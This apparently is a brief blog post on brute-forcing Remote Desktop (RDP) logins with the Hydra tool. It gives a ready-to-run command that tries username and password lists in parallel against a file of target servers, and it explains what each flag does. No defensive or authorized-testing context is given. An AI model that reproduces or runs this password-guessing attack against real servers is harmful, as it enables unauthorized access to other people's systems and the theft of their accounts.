Brute Force RDP with Hydra (Remote Desktop Bruteforce)
HomePage: https://www.thc.org/
Open terminal:
hydra -t 6 -w 6 -L /path_file/user.txt -P /path_file/pass.txt -o /path_file/save.txt -V -M /path_file/IpScan.txt rdp
Options:
-l user
-L File User
-p pass
-P File Pass
-M FILE list of servers to attack
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-W Time Out
-V Showing Password being tried
Video tutorial:
Comments
Post a Comment